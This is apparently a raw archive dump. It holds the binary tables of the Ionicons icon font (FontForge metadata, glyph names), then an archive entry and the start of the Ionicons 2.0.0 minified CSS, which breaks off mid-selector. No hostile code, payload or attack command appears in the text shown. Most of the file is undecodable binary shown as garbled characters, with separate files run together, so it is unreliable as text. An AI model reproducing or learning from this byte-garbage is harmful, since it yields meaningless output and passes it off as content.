�����Pdl����X����� #t$�%h&(''t(0(�)d)�*�++X+�+�+�,@,`,�,�-$-�.@/X0�122�3d4,4�5L5�6P6�7\8�9d9�:�:�;�<T=(=t>>�??T?|?�@�AlB$B|C�D0D�FdG G�HIhJJ�KXK�L�M$M�M�N�O@O�P\Q�RPR�S4S�TT|T�U�VV�WWtW�X�Y4Y�Y�[\4\�]t]�^�_L_�`T`�aPa�b�b�c\d`e4f�ghi�j�l�nDo�p�q@q�sLt�u�ww4w\w�w�w�x<x�yy|y�{�~~��<���,��� ����������L�`��0�����H�,�T�(������������������P�h��L���@�������<���\�p�$��$�������h�T�����d���|�`������X�h�<���p���d���P¼����� �L�$��p�����l�8̨�ψ������ۤ�8�D߼����L�T�P����p�����t�0��t�<��P���$������������l�����TH8�Xd��tL��		�
T��

`p8,L��`8��0�#�%�&`(�)�*�*�+�,l-p..<.\.�/@/�0P0�1�2 33�4�5X78H9\:p;;x;�<�=@=�?P@�AA(B�C|C�DxEDF�HI@I�JJ�J�L�N�P�Q`Q�R0StTLUpVtW�X�Y�Z�[�\�^�`�aHbcpdte�fXf�gPhh�iLi�jhj�kpk�l�m(o0qhtDt�udv�w0w�x�y�{D|�}8}���H���p������\����� �������0�x�p�|�����������r`mn�	��D���$I���	�	�	�	H�	n	 �	�Created by Adam Bradley with FontForge 2.0 (http://fontforge.sf.net)Created by Adam Bradley with FontForge 2.0 (http://fontforge.sf.net)IoniconsIoniconsMediumMediumFontForge 2.0 : Ionicons : 4-12-2014FontForge 2.0 : Ionicons : 4-12-2014IoniconsIoniconsVersion 001.000 Version 001.000 IoniconsIonicons���	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~�����������������������������������������������������������������������������������������������uniF100uniF101uniF102uniF103uniF104uniF105uniF106uniF107uniF108uniF109uniF10AuniF10BuniF10CuniF10DuniF10EuniF10FuniF110uniF111uniF112uniF113uniF114uniF115uniF116uniF117uniF118uniF119uniF11AuniF11BuniF11CuniF11DuniF11EuniF11FuniF120uniF121uniF122uniF123uniF124uniF125uniF126uniF127uniF128uniF129uniF12AuniF12BuniF12CuniF12DuniF12EuniF12FuniF130uniF131uniF132uniF133uniF134uniF135uniF136uniF137uniF139uniF13AuniF13DuniF13EuniF13FuniF140uniF141uniF142uniF143uniF144uniF147uniF148uniF149uniF14AuniF14BuniF1F9uniF1FAuniF1FBuniF1FCuniF1FDuniF1FEuniF1FFuniF200uniF201uniF202uniF203uniF204uniF205uniF206uniF207uniF208uniF209uniF20AuniF20BuniF20CuniF20DuniF20EuniF20FuniF210uniF211uniF212uniF213uniF214uniF215uniF216uniF217uniF218uniF219uniF21AuniF21BuniF21CuniF21DuniF21EuniF21FuniF220uniF221uniF222uniF223uniF224uniF225uniF226uniF227uniF228uniF229uniF22AuniF22BuniF22CuniF22DuniF22EuniF22FuniF230uniF231uniF232uniF233uniF234uniF235uniF236uniF237uniF238uniF239uniF23AuniF23BuniF23CuniF23DuniF23EuniF23FuniF240uniF241uniF242uniF243uniF244uniF245uniF246uniF247uniF248uniF249uniF24AuniF24BuniF24CuniF24DuniF24EuniF24FuniF250uniF251uniF252uniF253uniF254uniF255uniF256uniF257uniF258uniF259uniF25AuniF25BuniF25CuniF25DuniF25EuniF25FuniF260uniF261uniF262uniF263uniF264uniF265uniF266uniF267uniF268uniF269uniF26AuniF26BuniF26CuniF26DuniF26EuniF26FuniF270uniF271uniF272uniF273uniF274uniF275uniF276uniF277uniF278uniF279uniF27AuniF27BuniF27CuniF27DuniF295uniF296uniF297uniF298uniF299uniF29AuniF29BuniF29CuniF29DuniF29EuniF29FuniF2A0uniF2A1uniF2A2uniF2A3uniF2A4uniF2A5uniF2A6uniF2A7uniF2A8uniF2A9uniF2AAuniF2ABuniF2ACuniF2ADuniF2AEuniF2AFuniF2B0uniF2B1uniF2B2uniF2B3uniF2B4uniF2B5uniF2B6uniF2B7uniF2B8uniF2B9uniF2BAuniF2BEuniF2BFuniF2C0uniF2C1uniF2C2uniF2C3uniF2C4uniF2C5uniF2C7uniF2C9uniF2CAuniF2D1uniF2D2uniF2D3uniF2D4uniF2D7uniF2D8uniF2D9uniF2DDuniF2E0uniF2E3uniF2E4uniF2E9uniF2EBuniF2ECuniF2F0uniF2F4uniF2F5uniF2F6uniF2F7uniF2F8uniF2FCuniF2FDuniF305uniF306uniF30AuniF30BuniF30CuniF30FuniF313uniF314uniF315uniF316uniF317uniF318uniF319uniF31AuniF31BuniF31CuniF31DuniF33FuniF340uniF341uniF342uniF343uniF344uniF345uniF346uniF347uniF348uniF349uniF34AuniF34BuniF34CuniF34DuniF34EuniF34FuniF350uniF351uniF352uniF353uniF354uniF355uniF356uniF357uniF358uniF359uniF35AuniF35BuniF35CuniF35DuniF35EuniF35FuniF360uniF361uniF362uniF363uniF364uniF365uniF366uniF367uniF368uniF369uniF36AuniF36BuniF36CuniF36DuniF36EuniF36FuniF370uniF371uniF372uniF373uniF374uniF375uniF376uniF377uniF378uniF379uniF37AuniF37BuniF37CuniF37DuniF37EuniF37FuniF380uniF381uniF382uniF383uniF384uniF385uniF386uniF387uniF388uniF389uniF38AuniF38BuniF38CuniF38DuniF38EuniF38FuniF390uniF391uniF392uniF393uniF394uniF395uniF396uniF397uniF398uniF399uniF39AuniF39BuniF39CuniF39DuniF39EuniF39FuniF3A0uniF3A1uniF3A2uniF3A3uniF3A4uniF3A5uniF3A6uniF3A7uniF3A8uniF3A9uniF3AAuniF3ABuniF3ACuniF3ADuniF3AEuniF3AFuniF3B0uniF3B1uniF3B2uniF3B3uniF3B4uniF3B5uniF3B6uniF3B7uniF3B8uniF3B9uniF3BAuniF3BBuniF3BCuniF3BDuniF3BEuniF3BFuniF3C0uniF3C1uniF3C2uniF3C3uniF3C4uniF3C5uniF3C6uniF3C7uniF3C8uniF3C9uniF3CAuniF3CBuniF3CCuniF3CDuniF3CEuniF3CFuniF3D0uniF3D1uniF3D2uniF3D3uniF3D4uniF3D5uniF3D6uniF3D7uniF3D8uniF3D9uniF3DAuniF3DBuniF3DCuniF3DDuniF3DEuniF3DFuniF3E0uniF3E1uniF3E2uniF3E3uniF3E4uniF3E5uniF3E6uniF3E7uniF3E8uniF3E9uniF3EAuniF3EBuniF3ECuniF3EDuniF3EEuniF3EFuniF3F0uniF3F1uniF3F2uniF3F3uniF3F4uniF3F5uniF3F6uniF3F7uniF3F8uniF3F9uniF3FAuniF3FBuniF3FCuniF3FDuniF3FEuniF3FFuniF400uniF401uniF402uniF403uniF404uniF405uniF406uniF407uniF408uniF409uniF40AuniF40BuniF40CuniF40DuniF40EuniF40FuniF410uniF411uniF412uniF413uniF414uniF415uniF416uniF417uniF418uniF419uniF41AuniF41BuniF41CuniF41DuniF41EuniF41FuniF420uniF421uniF422uniF423uniF424uniF425uniF426uniF427uniF428uniF429uniF42AuniF42BuniF42CuniF42DuniF42EuniF42FuniF430uniF431uniF432uniF433uniF434uniF435uniF436uniF437uniF438uniF439uniF43AuniF43BuniF43CuniF43DuniF43EuniF43FuniF440uniF441uniF442uniF443uniF444uniF445uniF446uniF447uniF448uniF449uniF44AuniF44BuniF44CuniF44DuniF44EuniF44FuniF450uniF451uniF452uniF453uniF454uniF455uniF456uniF457uniF458uniF459uniF45AuniF45BuniF45CuniF45DuniF45EuniF45FuniF460uniF461uniF462uniF463uniF464uniF465uniF466uniF467uniF468uniF469uniF46AuniF46BuniF46CuniF46DuniF46EuniF46FuniF470uniF471uniF472uniF473uniF474uniF475uniF476uniF477uniF478uniF479uniF47AuniF47BuniF47CuniF47DuniF47EuniF47FuniF480uniF481uniF482uniF483uniF484uniF485uniF486uniF487uniF488uniF489uniF48AuniF48BuniF48CuniF48DuniF48EuniF48FuniF490uniF491uniF492uniF493uniF494uniF495uniF496uniF497uniF498uniF499uniF49AuniF49BuniF49CuniF49DuniF49EuniF49FuniF4A0uniF4A1uniF4A2uniF4A3uniF4A4uniF4A5uniF4A6uniF4A7uniF4A8uniF4A9uniF4AAuniF4ABuniF4ACuniF4ADuniF4AEuniF4AFuniF4B0uniF4B1uniF4B2uniF4B3uniF4B4uniF4B5uniF4B6uniF4B7uniF4B8uniF4B9uniF4BAuniF4BBuniF4BCuniF4BDuniF4BEuniF4BFuniF4C0uniF4C1uniF4C2uniF4C3uniF4C4uniF4C5uniF4C6uniF4C7uniF4C8uniF4C9uniF4CAuniF4CBuniF4CCuniF4CDuniF4CEuniF4CFuniF4D0uniF4D1uniF4D2uniF4D3uniF4D4uniF4D5uniF4D6uniF4D7uniF4D8uniF4D9uniF4DAuniF4DBuniF4DCuniF4DDuniF4DEuniF4DFuniF4E0uniF4E1uniF4E2uniF4E3uniF4E4uniF4E5uniF4E6uniF4E7uniF4E8uniF4E9uniF4EAuniF4EBuniF4ECuniF4EDuniF4EEuniF4EFuniF4F0uniF4F1uniF4F2uniF4F3uniF4F4uniF4F5uniF4F6uniF4F7��22�������,� `f-�, d ��P�&Z�E[X!#!�X �PPX!�@Y �8PX!�8YY �
Ead�(PX!�
E �0PX!�0Y ��PX f ��a �
PX` � PX!�
` �6PX!�6``YYY�+YY#�PXeYY-�, E �%ad �CPX�#B�#B!!Y�`-�,#!#! d�bB �#B�
*! �C � ��+�0%�QX`PaRYX#Y! �@SX�+!�@Y#�PXeY-�,�C+�C`B-�,�#B# �#Ba��b�`�*-�,  E �Ec�Eb`D�`-�,  E �+#�%` E�#a d � PX!��0PX� �@YY#�PXeY�%#aDD�`-�,�E�aD-�	,�`  �	CJ�PX �	#BY�
CJ�RX �
#BY-�
, �b �c�#a�C` �` �#B#-�,KTX�DY$�
e#x-�,KQXKSX�DY!Y$�e#x-�
,�CUX�C�aB�
+Y�C�%B�	%B�
%B�# �%PX�C`�%B�� �#a�	*!#�a �#a�	*!�C`�%B�%a�	*!Y�	CG�
CG`��b �Ec�Eb`�#D�C�>�C`B-�,�ETX�#B `�a�

BB�`�
+�m+"Y-�,�+-�,�+-�,�+-�,�+-�,�+-�,�+-�,�+-�,�+-�,�+-�,�	+-�,�+�ETX�#B `�a�

BB�`�
+�m+"Y-�,�+-�,�+-�,�+-�,�+-�,�+-�,�+-� ,�+-�!,�+-�",�+-�#,�	+-�$, <�`-�%, `�
` C#�`C�%a�`�$*!-�&,�%+�%*-�',  G  �Ec�Eb`#a8# �UX G  �Ec�Eb`#a8!Y-�(,�ETX��'*�0"Y-�),�+�ETX��'*�0"Y-�*, 5�`-�+,�Ec�Eb�+�Ec�Eb�+��D>#8�**-�,, < G �Ec�Eb`�Ca8-�-,.<-�., < G �Ec�Eb`�Ca�Cc8-�/,�% . G�#B�%I��G#G#a Xb!Y�#B�.*-�0,��%�%G#G#a�E+e�.#  <�8-�1,��%�% .G#G#a �#B�E+ �`PX �@QX�  �&YBB# �C �#G#G#a#F`�C��b` �+ ��a �C`d#�CadPX�Ca�C`Y�%��ba#  �&#Fa8#�CF�%�CG#G#a` �C��b`# �+#�C`�+�%a�%��b�&a �%`d#�%`dPX!#!Y#  �&#Fa8Y-�2,�   �& .G#G#a#<8-�3,� �#B   F#G�+#a8-�4,��%�%G#G#a�TX. <#!�%�%G#G#a �%�%G#G#a�%�%I�%a�Ec# Xb!Yc�Eb`#.#  <�8#!Y-�5,� �C .G#G#a `� `f��b#  <�8-�6,# .F�%FRX <Y.�&+-�7,# .F�%FPX <Y.�&+-�8,# .F�%FRX <Y# .F�%FPX <Y.�&+-�9,�0+# .F�%FRX <Y.�&+-�:,�1+�  <�#B�8# .F�%FRX <Y.�&+�C.�&+-�;,��%�& .G#G#a�E+# < .#8�&+-�<,�%B��%�% .G#G#a �#B�E+ �`PX �@QX�  �&YBB# G�C��b` �+ ��a �C`d#�CadPX�Ca�C`Y�%��ba�%Fa8# <#8!  F#G�+#a8!Y�&+-�=,�0+.�&+-�>,�1+!#  <�#B#8�&+�C.�&+-�?,� G�#B�.�,*-�@,� G�#B�.�,*-�A,��-*-�B,�/*-�C,�E# . F�#a8�&+-�D,�#B�C+-�E,�<+-�F,�<+-�G,�<+-�H,�<+-�I,�=+-�J,�=+-�K,�=+-�L,�=+-�M,�9+-�N,�9+-�O,�9+-�P,�9+-�Q,�;+-�R,�;+-�S,�;+-�T,�;+-�U,�>+-�V,�>+-�W,�>+-�X,�>+-�Y,�:+-�Z,�:+-�[,�:+-�\,�:+-�],�2+.�&+-�^,�2+�6+-�_,�2+�7+-�`,��2+�8+-�a,�3+.�&+-�b,�3+�6+-�c,�3+�7+-�d,�3+�8+-�e,�4+.�&+-�f,�4+�6+-�g,�4+�7+-�h,�4+�8+-�i,�5+.�&+-�j,�5+�6+-�k,�5+�7+-�l,�5+�8+-�m,+�e�$Px�0-K��RX��Y�c �#D�#p�(	ERD�
*�D�$�QX�@�X�D�&�QX��X�DYYYY������DPK!�i�T�T�.it_sanctum/fonts/ionicons/css/ionicons.min.cssnu&1i�@charset "UTF-8";/*!
  Ionicons, v2.0.0
  Created by Ben Sperry for the Ionic Framework, http://ionicons.com/
  https://twitter.com/benjsperry  https://twitter.com/ionicframework
  MIT License: https://github.com/driftyco/ionicons

  Android-style icons originally built by Google’s
  Material Design Icons: https://github.com/google/material-design-icons
  used under CC BY http://creativecommons.org/licenses/by/4.0/
  Modified icons to fit ionicon’s grid from original.
*/@font-face{font-family:"Ionicons";src:url("../fonts/ionicons.eot?v=2.0.0");src:url("../fonts/ionicons.eot?v=2.0.0#iefix") format("embedded-opentype"),url("../fonts/ionicons.ttf?v=2.0.0") format("truetype"),url("../fonts/ionicons.woff?v=2.0.0") format("woff"),url("../fonts/ionicons.svg?v=2.0.0#Ionicons") format("svg");font-weight:normal;font-style:normal}.ion,.ionicons,.ion-alert:before,.ion-alert-circled:before,.ion-android-add:before,.ion-android-add-circle:before,.ion-android-alarm-clock:before,.ion-android-alert:before,.ion-android-apps:before,.ion-android-archive:before,.ion-android-arrow-back:before,.ion-android-arrow-down:before,.ion-android-arrow-dropdown:before,.ion-android-arrow-dropdown-circle:before,.ion-android-arrow-dropleft:before,.ion-android-arrow-dropleft-circle:before,.ion-android-arrow-dropright:before,.ion-android-arrow-dropright-circle:before,.ion-android-arrow-dropup:before,.ion-android-arrow-dropup-circle:before,.ion-android-arrow-forward:before,.ion-android-arrow-up:before,.ion-android-attach:before,.ion-android-bar:before,.ion-android-bicycle:before,.ion-android-boat:before,.ion-android-bookmark:before,.ion-android-bulb:before,.ion-android-bus:before,.ion-android-calendar:before,.ion-android-call:before,.ion-android-camera:before,.ion-android-cancel:before,.ion-android-car:before,.ion-android-cart:before,.ion-android-chat:before,.ion-android-checkbox:before,.ion-android-checkbox-blank:before,.ion-android-checkbox-outline:before,.ion-android-checkbox-outline-blank:before,.ion-android-checkmark-circle:before,.ion-android-clipboard:before,.ion-android-close:before,.ion-android-cloud:before,.ion-android-cloud-circle:before,.ion-android-cloud-done:before,.ion-android-cloud-outline:before,.ion-android-color-palette:before,.ion-android-compass:before,.ion-android-contact:before,.ion-android-contacts:before,.ion-android-contract:before,.ion-android-create:before,.ion-android-delete:before,.ion-android-desktop:before,.ion-android-document:before,.ion-android-done:before,.ion-android-done-all:before,.ion-android-download:before,.ion-android-drafts:before,.ion-android-exit:before,.ion-android-expand:before,.ion-android-favorite:before,.ion-android-favorite-outline:before,.ion-android-film:before,.ion-android-folder:before,.ion-android-folder-open:before,.ion-android-funnel:before,.ion-android-globe:before,.ion-android-hand:before,.ion-android-hangout:before,.ion-android-happy:before,.ion-android-home:before,.ion-android-image:before,.ion-android-laptop:before,.ion-android-list:before,.ion-android-locate:before,.ion-android-lock:before,.ion-android-mail:before,.ion-android-map:before,.ion-android-menu:before,.ion-android-microphone:before,.ion-android-microphone-off:before,.ion-android-more-horizontal:before,.ion-android-more-vertical:before,.ion-android-navigate:before,.ion-android-notifications:before,.ion-android-notifications-none:before,.ion-android-notifications-off:before,.ion-android-open:before,.ion-android-options:before,.ion-android-people:before,.ion-android-person:before,.ion-android-person-add:before,.ion-android-phone-landscape:before,.ion-android-phone-portrait:before,.ion-android-pin:before,.ion-android-plane:before,.ion-android-playstore:before,.ion-android-print:before,.ion-android-radio-button-off:before,.ion-android-radio-button-on:before,.ion-android-refresh:before,.ion-android-remove:before,.ion-android-remove-circle:before,.ion-android-restaurant:before,.ion-android-sad:before,.ion-android-search:before,.ion-android-send:before,.ion-android-settings:before,.ion-android-share:before,.ion-android-share-alt:before,.ion-android-star:before,.ion-android-star-half:before,.ion-android-star-outline:before,.ion-android-stopwatch:before,.ion-android-subway:before,.ion-android-sunny:before,.ion-android-sync:before,.ion-android-textsms:before,.ion-android-time:before,.ion-android-train:before,.ion-android-unlock:before,.ion-android-upload:before,.ion-android-volume-down:before,.ion-android-volume-mute:before,.ion-android-volume-off:before,.ion-android-volume-up:before,.ion-android-walk:before,.ion-android-warning:before,.ion-android-watch:before,.ion-android-wifi:before,.ion-aperture:before,.ion-archive:before,.ion-arrow-down-a:before,.ion-arrow-down-b:before,.ion-arrow-down-c:before,.ion-arrow-expand:before,.ion-arrow-graph-down-left:before,.ion-arrow-graph-down-right:before,.ion-arrow-graph-up-left:before,.ion-arrow-graph-up-right:before,.ion-arrow-left-a:before,.ion-arrow-left-b:before,.ion-arrow-left-c:before,.ion-arrow-move:before,.ion-arrow-resize:before,.ion-arrow-return-left:before,.ion-arrow-return-right:before,.ion-arrow-right-a:before,.ion-arrow-right-b:before,.ion-arrow-right-c:before,.ion-arrow-shrink:before,.ion-arrow-swap:before,.ion-arrow-up-a:before,.ion-arrow-up-b:before,.ion-arrow-up-c:before,.ion-asterisk:before,.ion-at:before,.ion-backspace:before,.ion-backspace-outline:before,.ion-bag:before,.ion-battery-charging:before,.ion-battery-empty:before,.ion-battery-full:before,.ion-battery-half:before,.ion-battery-low:before,.ion-beaker:before,.ion-beer:before,.ion-bluetooth:before,.ion-bonfire:before,.ion-bookmark:before,.ion-bowtie:before,.ion-briefcase:before,.ion-bug:before,.ion-calculator:before,.ion-calendar:before,.ion-camera:before,.ion-card:before,.ion-cash:before,.ion-chatbox:before,.ion-chatbox-working:before,.ion-chatboxes:before,.ion-chatbubble:before,.ion-chatbubble-working:before,.ion-chatbubbles:before,.ion-checkmark:before,.ion-checkmark-circled:before,.ion-checkmark-round:before,.ion-chevron-down:before,.ion-chevron-left:before,.ion-chevron-right:before,.ion-chevron-up:before,.ion-clipboard:before,.ion-clock:before,.ion-close:before,.ion-close-circled:before,.ion-close-round:before,.ion-closed-captioning:before,.ion-cloud:before,.ion-code:before,.ion-code-download:before,.ion-code-working:before,.ion-coffee:before,.ion-compass:before,.ion-compose:before,.ion-connection-bars:before,.ion-contrast:before,.ion-crop:before,.ion-cube:before,.ion-disc:before,.ion-document:before,.ion-document-text:before,.ion-drag:before,.ion-earth:before,.ion-easel:before,.ion-edit:before,.ion-egg:before,.ion-eject:before,.ion-email:before,.ion-email-unread:before,.ion-erlenmeyer-flask:before,.ion-erlenmeyer-flask-bubbles:before,.ion-eye:before,.ion-eye-disabled:before,.ion-female:before,.ion-filing:before,.ion-film-marker:before,.ion-fireball:before,.ion-flag:before,.ion-flame:before,.ion-flash:before,.ion-flash-off:before,.ion-folder:before,.ion-fork:before,.ion-fork-repo:before,.ion-forward:before,.ion-funnel:before,.ion-gear-a:before,.ion-gear-b:before,.ion-grid:before,.ion-hammer:before,.ion-happy:before,.ion-happy-outline:before,.ion-headphone:before,.ion-heart:before,.ion-heart-broken:before,.ion-help:before,.ion-help-buoy:before,.ion-help-circled:before,.ion-home:before,.ion-icecream:before,.ion-image:before,.ion-images:before,.ion-information:before,.ion-information-circled:before,.ion-ionic:before,.ion-ios-alarm:before,.ion-ios-alarm-outline:before,.ion-ios-albums:before,.ion-ios-albums-outline:before,.ion-ios-americanfootball:before,.ion-ios-americanfootball-outline:before,.ion-ios-analytics:before,.ion-ios-analytics-outline:before,.ion-ios-arrow-back:before,.ion-ios-arrow-down:before,.ion-ios-arrow-forward:before,.ion-ios-arrow-left:before,.ion-ios-arrow-right:before,.ion-ios-arrow-thin-down:before,.ion-ios-arrow-thin-left:before,.ion-ios-arrow-thin-right:before,.ion-ios-arrow-thin-up:before,.ion-ios-arrow-up:before,.ion-ios-at:before,.ion-ios-at-outline:before,.ion-ios-barcode:before,.ion-ios-barcode-outline:before,.ion-ios-baseball:before,.ion-ios-baseball-outline:before,.ion-ios-basketball:before,.ion-ios-basketball-outline:before,.ion-ios-bell:before,.ion-ios-bell-outline:before,.ion-ios-body:before,.ion-ios-body-outline:before,.ion-ios-bolt:before,.ion-ios-bolt-outline:before,.ion-ios-book:before,.ion-ios-book-outline:before,.ion-ios-bookmarks:before,.ion-ios-bookmarks-outline:before,.ion-ios-box:before,.ion-ios-box-outline:before,.ion-ios-briefcase:before,.ion-ios-briefcase-outline:before,.ion-ios-browsers:before,.ion-ios-browsers-outline:before,.ion-ios-calculator:before,.ion-ios-calculator-outline:before,.ion-ios-calendar:before,.ion-ios-calendar-outline:before,.ion-ios-camera:before,.ion-ios-camera-outline:before,.ion-ios-cart:before,.ion-ios-cart-outline:before,.ion-ios-chatboxes:before,.ion-ios-chatboxes-outline:before,.ion-ios-chatbubble:before,.ion-ios-chatbubble-outline:before,.ion-ios-checkmark:before,.ion-ios-checkmark-empty:before,.ion-ios-checkmark-outline:before,.ion-ios-circle-filled:before,.ion-ios-circle-outline:before,.ion-ios-clock:before,.ion-ios-clock-outline:before,.ion-ios-close:before,.ion-ios-close-empty:before,.ion-ios-close-outline:before,.ion-ios-cloud:before,.ion-ios-cloud-download:before,.ion-ios-cloud-download-outline:before,.ion-ios-cloud-outline:before,.ion-ios-cloud-upload:before,.ion-ios-cloud-upload-outline:before,.ion-ios-cloudy:before,.ion-ios-cloudy-night:before,.ion-ios-cloudy-night-outline:before,.ion-ios-cloudy-outline:before,.ion-ios-cog:before,.ion-ios-cog-outline:before,.ion-ios-color-filter:before,.ion-ios-color-filter-outline:before,.ion-ios-color-wand:before,.ion-ios-color-wand-outline:before,.ion-ios-compose:before,.ion-ios-compose-outline:before,.ion-ios-contact:before,.ion-ios-contact-outline:before,.ion-ios-copy:before,.ion-ios-copy-outline:before,.ion-ios-crop:before,.ion-ios-crop-strong:before,.ion-ios-download:before,.ion-ios-download-outline:before,.ion-ios-drag:before,.ion-ios-email:before,.ion-ios-email-outline:before,.ion-ios-eye:before,.ion-ios-eye-outline:before,.ion-ios-fastforward:before,.ion-ios-fastforward-outline:before,.ion-ios-filing:before,.ion-ios-filing-outline:before,.ion-ios-film:before,.ion-ios-film-outline:before,.ion-ios-flag:before,.ion-ios-flag-outline:before,.ion-ios-flame:before,.ion-ios-flame-outline:before,.ion-ios-flask:before,.ion-ios-flask-outline:before,.ion-ios-flower:before,.ion-ios-flower-outline:before,.ion-ios-folder:before,.ion-ios-folder-outline:before,.ion-ios-football:before,.ion-ios-football-outline:before,.ion-ios-game-controller-a:before,.ion-ios-game-controller-a-outline:before,.ion-ios-game-controller-b:before,.ion-ios-game-controller-b-outline:before,.ion-ios-gear:before,.ion-ios-gear-outline:before,.ion-ios-glasses:before,.ion-ios-glasses-outline:before,.ion-ios-grid-view:before,.ion-ios-grid-view-outline:before,.ion-ios-heart:before,.ion-ios-heart-outline:before,.ion-ios-help:before,.ion-ios-help-empty:before,.ion-ios-help-outline:before,.ion-ios-home:before,.ion-ios-home-outline:before,.ion-ios-infinite:before,.ion-ios-infinite-outline:before,.ion-ios-information:before,.ion-ios-information-empty:before,.ion-ios-information-outline:before,.ion-ios-ionic-outline:before,.ion-ios-keypad:before,.ion-ios-keypad-outline:before,.ion-ios-lightbulb:before,.ion-ios-lightbulb-outline:before,.ion-ios-list:before,.ion-ios-list-outline:before,.ion-ios-location:before,.ion-ios-location-outline:before,.ion-ios-locked:before,.ion-ios-locked-outline:before,.ion-ios-loop:before,.ion-ios-loop-strong:before,.ion-ios-medical:before,.ion-ios-medical-outline:before,.ion-ios-medkit:before,.ion-ios-medkit-outline:before,.ion-ios-mic:before,.ion-ios-mic-off:before,.ion-ios-mic-outline:before,.ion-ios-minus:before,.ion-ios-minus-empty:before,.ion-ios-minus-outline:before,.ion-ios-monitor:before,.ion-ios-monitor-outline:before,.ion-ios-moon:before,.ion-ios-moon-outline:before,.ion-ios-more:before,.ion-ios-more-outline:before,.ion-ios-musical-note:before,.ion-ios-musical-notes:before,.ion-ios-navigate:before,.ion-ios-navigate-outline:before,.ion-ios-nutrition:before,.ion-ios-nutrition-outline:before,.ion-ios-paper:before,.ion-ios-paper-outline:before,.ion-ios-paperplane:before,.ion-ios-paperplane-outline:before,.ion-ios-partlysunny:before,.ion-ios-partlysunny-outline:before,.ion-ios-pause:before,.ion-ios-pause-outline:before,.ion-ios-paw:before,.ion-ios-paw-outline:before,.ion-ios-people:before,.ion-ios-people-outline:before,.ion-ios-person:before,.ion-ios-person-outline:before,.ion-ios-personadd:before,.ion-ios-personadd-outline:before,.ion-ios-photos:before,.ion-ios-photos-outline:before,.ion-ios-pie:before,.ion-ios-pie-outline:before,.ion-ios-pint:before,.ion-ios-pint-outline:before,.ion-ios-play:before,.ion-ios-play-outline:before,.ion-ios-plus:before,.ion-ios-plus-empty:before,.ion-ios-plus-outline:before,.ion-ios-pricetag:before,.ion-ios-pricetag-outline:before,.ion-ios-pricetags:before,.ion-ios-pricetags-outline:before,.ion-ios-printer:before,.ion-ios-printer-outline:before,.ion-ios-pulse:before,.ion-ios-pulse-strong:before,.ion-ios-rainy:before,.ion-ios-rainy-outline:before,.ion-ios-recording:before,.ion-ios-recording-outline:before,.ion-ios-redo:before,.ion-ios-redo-outline:before,.ion-ios-refresh:before,.ion-ios-refresh-empty:before,.ion-ios-refresh-outline:before,.ion-ios-reload:before,.ion-ios-reverse-camera:before,.ion-ios-reverse-camera-outline:before,.ion-ios-rewind:before,.ion-ios-rewind-outline:before,.ion-ios-rose:before,.ion-ios-rose-outline:before,.ion-ios-search:before,.ion-ios-search-strong:before,.ion-ios-settings:before,.ion-ios-settings-strong:before,.ion-ios-shuffle:before,.ion-ios-shuffle-strong:before,.ion-ios-skipbackward:before,.ion-ios-skipbackward-outline:before,.ion-ios-skipforward:before,.ion-ios-skipforward-outline:before,.ion-ios-snowy:before,.ion-ios-speedometer:before,.ion-ios-speedometer-outline:before,.ion-ios-star:before,.ion-ios-star-half:before,.ion-ios-star-outline:before,.ion-ios-stopwatch:before,.ion-ios-stopwatch-outline:before,.ion-ios-sunny:before,.ion-ios-sunny-outline:before,.ion-ios-telephone:before,.ion-ios-telephone-outline:before,.ion-ios-tennisball:before,.ion-ios-tennisball-outline:before,.ion-ios-thunderstorm:before,.ion-ios-thunderstorm-outline:before,.ion-ios-time:before,.ion-ios-time-outline:before,.ion-ios-timer:before,.ion-ios-timer-outline:before,.ion-ios-toggle:before,.ion-ios-toggle-outline:before,.ion-ios-trash:before,.ion-ios-trash-outline:before,.ion-ios-undo:before,.ion-ios-undo-outline:before,.ion-ios-unlocked:before,.ion-ios-unlocked-outline:before,.ion-ios-upload:before,.ion-ios-upload-outline:before,.ion-ios-videocam:before,.ion-ios-videocam-outline:before,.ion-ios-volume-high:before,.ion-ios-volume-low:before,.ion-ios-wineglass:before,.ion-ios-wineglass-outline:before,.ion-ios-world:before,.ion-ios-world-outline:before,.ion-ipad:before,.ion-iphone:before,.ion-ipod:before,.ion-jet:before,.ion-key:before,.ion-knife:before,.ion-laptop:before,.ion-leaf:before,.ion-levels:before,.ion-lightbulb:before,.ion-link:before,.ion-load-a:before,.ion-load-b:before,.ion-load-c:before,.ion-load-d:before,.ion-location:before,.ion-lock-combination:before,.ion-locked:before,.ion-log-in:before,.ion-log-out:before,.ion-loop:before,.ion-magnet:before,.ion-male:before,.ion-man:before,.ion-map:before,.ion-medkit:before,.ion-merge:before,.ion-mic-a:before,.ion-mic-b:before,.ion-mic-c:before,.ion-minus:before,.ion-minus-circled:before,.ion-minus-round:before,.ion-model-s:before,.ion-monitor:before,.ion-more:before,.ion-mouse:before,.ion-music-note:before,.ion-navicon:before,.ion-navicon-round:before,.ion-navigate:before,.ion-network:before,.ion-no-smoking:before,.ion-nuclear:before,.ion-outlet:before,.ion-paintbrush:before,.ion-paintbucket:before,.ion-paper-airplane:before,.ion-paperclip:before,.ion-pause:before,.ion-person:before,.ion-person-add:before,.ion-person-stalker:before,.ion-pie-graph:before,.ion-pin:before,.ion-pinpoint:before,.ion-pizza:before,.ion-plane:before,.ion-planet:before,.ion-play:before,.ion-playstation:before,.ion-plus:before,.ion-plus-circled:before,.ion-plus-round:before,.ion-podium:before,.ion-pound:before,.ion-power:before,.ion-pricetag:before,.ion-pricetags:before,.ion-printer:before,.ion-pull-request:before,.ion-qr-scanner:before,.ion-quote:before,.ion-radio-waves:before,.ion-record:before,.ion-refresh:before,.ion-reply:before,.ion-reply-all:before,.ion-ribbon-a:before,.ion-ribbon-b:before,.ion-sad:before,.ion-sad-outline:before,.ion-scissors:before,.ion-search:before,.ion-settings:before,.ion-share:before,.ion-shuffle:before,.ion-skip-backward:before,.ion-skip-forward:before,.ion-social-android:before,.ion-social-android-outline:before,.ion-social-angular:before,.ion-social-angular-outline:before,.ion-social-apple:before,.ion-social-apple-outline:before,.ion-social-bitcoin:before,.ion-social-bitcoin-outline:before,.ion-social-buffer:before,.ion